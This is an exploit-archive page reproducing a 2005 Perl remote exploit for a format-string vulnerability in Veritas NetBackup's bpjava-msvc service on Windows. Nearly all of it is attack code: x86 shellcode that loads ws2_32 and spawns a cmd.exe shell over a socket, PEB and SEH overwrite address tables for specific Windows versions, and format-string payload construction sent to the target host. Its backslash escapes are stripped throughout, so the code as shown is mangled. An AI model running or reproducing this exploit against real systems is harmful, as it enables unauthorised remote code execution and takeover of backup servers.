[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (win32)
# Published : 2005-10-20
# Author : Kevin Finisterre
# Previous Title : Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit
# Next Title : HP-UX FTP Server Preauthentication Directory Listing Exploit (meta)
#!C:Perlbinperl.exe -w
#
# Vertias Netbackup Win32 format string exploit
# Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com
#
# For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical
# For win xp sp2 we overwrote SEH
# http://www.digitalmunition.com/
#
# You may have to run this 2 times.
use IO::Socket;
use Getopt::Std; getopts('h:p:t:', our %args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 13722;}
if (defined($args{'t'})) { $target = $args{'t'}; }
print "n-=[Remote Veritas NetBackup Format String exploit]=-nn";
print "n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunition[dot]com]=-nn";
if(!defined($host)){
print "Usage:
-h <host>
-p port <default 13722>
-t target:
0 - Windows 2k/Windows XP SP0/SP1 - PEB
1 - Windows XP SP2 - SEHnn";
exit(1);
}
my $sock = new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => 'tcp');
$sock or die "no socket :$!";
# 970 chars in length.
my $shellcode = "x90"x100;
$shellcode .=
"xebx42" .
"x56".
"x57".
"x8bx45x3c".
"x8bx54x05x78".
"x01xea" .
"x52" .
"x8bx52x20".
"x01xea".
"x31xc0".
"x31xc9".
"x41" .
"x8bx34x8a".
"x01xee".
"x31xff".
"xc1xcfx13" .
"xac" .
"x01xc7".
"x85xc0".
"x75xf6".
"x39xdf".
"x75xea".
"x5a" .
"x8bx5ax24" .
"x01xeb" .
"x66x8bx0cx4b".
"x8bx5ax1c" .
"x01xeb" .
"x8bx04x8b" .
"x01xe8" .
"x5f" .
"x5e" .
"xc3" .
"xfc" .
"x31xc0".
"x64x8bx40x30".
"x8dx78x20" .
"x8bx40x0c" .
"x8bx70x1c" .
"xad" .
"x8bx68x08".
"x89xee".
"x31xc0".
"x64x8bx40x30".
"x8bx40x0c" .
"x8bx40x1c" .
"x8bx68x08" .
"xbbx6fx5bx8bx9c".
"xe8x8fxffxffxff".
"xab" .
"xbbxe1x0fxfexb7".
"xe8x84xffxffxff".
"xab" .
"x89xf5".
"x31xc0".
"x66xb8x6cx6c".
"x50" .
"x68x33x32x2ex64".
"x68x77x73x32x5f".
"x54" .
"xbbx71xa7xe8xfe" .
"xe8x65xffxffxff" .
"xffxd0" .
"x89xef" .
"x89xc5" .
"x81xc4x70xfexffxff" .
"x54" .
"x31xc0".
"xfexc4".
"x40" .
"x50" .
"xbbx22x7dxabx7d".
"xe8x48xffxffxff".
"xffxd0" .
"x31xc0" .
"x50" .
"x50" .
"x50" .
"x50" .
"x40" .
"x50" .
"x40" .
"x50" .
"xbbxa6x55x34x79".
"xe8x32xffxffxff".
"xffxd0" .
"x89xc6" .
"x31xc0" .
"x50" .
"x50" .
"x35x02x01x70xcc".
"xfexcc" .
"x50" .
"x89xe0".
"x50" .
"x6ax10" .
"x50" .
"x56" .
"xbbx81xb4x2cxbe" .
"xe8x11xffxffxff" .
"xffxd0" .
"x31xc0" .
"x50" .
"x56" .
"xbbxd3xfax58x9b" .
"xe8x01xffxffxff" .
"xffxd0" .
"x58" .
"x60" .
"x6ax10".
"x54" .
"x50" .
"x56" .
"xbbx47xf3x56xc6".
"xe8xeexfexffxff".
"xffxd0" .
"x89xc6" .
"x31xdb" .
"x53" .
"x68x2ex63x6dx64".
"x89xe1" .
"x41" .
"x31xdb".
"x56" .
"x56" .
"x56" .
"x53" .
"x53" .
"x31xc0".
"xfexc4".
"x40" .
"x50" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x53" .
"x6ax44".
"x89xe0".
"x53" .
"x53" .
"x53" .
"x53" .
"x54" .
"x50" .
"x53" .
"x53" .
"x53" .
"x43" .
"x53" .
"x4b" .
"x53" .
"x53" .
"x51" .
"x53" .
"x87xfd" .
"xbbx21xd0x05xd0".
"xe8xa8xfexffxff".
"xffxd0" .
"x5b" .
"x31xc0".
"x48" .
"x50" .
"x53" .
"xbbx43xcbx8dx5f".
"xe8x96xfexffxff".
"xffxd0" .
"x56" .
"x87xef".
"xbbx12x6bx6dxd0".
"xe8x87xfexffxff".
"xffxd0" .
"x83xc4x5c" .
"x61" .
"xebx81";
#/*
#7FFDF250 54 PUSH ESP
#7FFDF251 5F POP EDI
#7FFDF252 B8 90909090 MOV EAX,90909090
#7FFDF257 FD STD
#7FFDF258 F2:AF REPNE SCAS DWORD PTR ES:[EDI]
#7FFDF25A 57 PUSH EDI
#7FFDF25B C3 RETN
#
#and
#
#over write FastPebLockRoutine pointer to EnterCriticalSection with our code address of 7FFDF250
#
#7FFDF020 7FFDF250
#
#*/
print "TARGET IS $targetn";
if ($target == 0) {
$c = 8;
@fmt_array = (
#WINDOWS 2K SP4/XP SP0-SP1
#OVERWRITE PEB FASTLOCKPOINTER -> RTLEnterCriticalSection
[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x7FFDF022, 0x7FFDF020 ],
[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x7ffd, 0xf250 ],
);
}
if ($target == 1) {
$c = 10;
@fmt_array = (
#windows XP SP2
#OVERWRITE STATIC SEH FRAME
[ 0x7FFDF250, 0x7FFDF252, 0x7FFDF254, 0x7FFDF256, 0x7FFDF258, 0x7FFDF25A, 0x0012ffb0, 0x0012ffb2, 0x0012ffb6, 0x0012ffb4 ],
[ 0x5f54, 0x90b8, 0x9090, 0xfc90, 0xaff2, 0xc357, 0x9090,0x9090,0x7FFD, 0xF250 ],
);
}
my $offset = 0;
my $dump_fmt=6; #amount of %.8x needed to reach stackbase
my $payload;
my $payload2;
my $hi;
my $lo;
my $last = 0;
my $flag = 2;
my @shift;
for (my $y = 0; $y < $c; $y = $y + 2)
{
$payload = "%08x" x $dump_fmt;
$payload2 = pack('l', $fmt_array[0][$y]) . "AAAA" . pack('l', $fmt_array[0][$y+1]);
$hi = $fmt_array[1][$y] - 0x2a - 35;
$lo = $fmt_array[1][$y+1] - $hi - 77;
$payload .= "%$hi" . "x%hn%$lo" . "x%hn";
print $sock " 118 1nSNO space fillern";
print scalar <$sock>;
print scalar <$sock>;
print $sock " 101 6n" .
"$payload" . "n" . # You must finish the line off with a line feed.
"dummy spacen" .
"$shellcoden" .
"$payload2" . "n" .
"spare bitsn" .
"spare bitsnn";
print scalar <$sock>;
print scalar <$sock>;
}
if ($target == 1)
{
#create exception so SEH is called
print $sock " 118 1nSNO space fillern";
print scalar <$sock>;
print scalar <$sock>;
print $sock " 101 6n" .
"%n" . "n" . # You must finish the line off with a line feed.
"dummy spacen" .
"$shellcoden" .
"AAAAAAAAAAAA" . "n" .
"spare bitsn" .
"spare bitsnn";
print scalar <$sock>;
print scalar <$sock>;
}
close $sock;
# www.Syue.com [2005-10-20]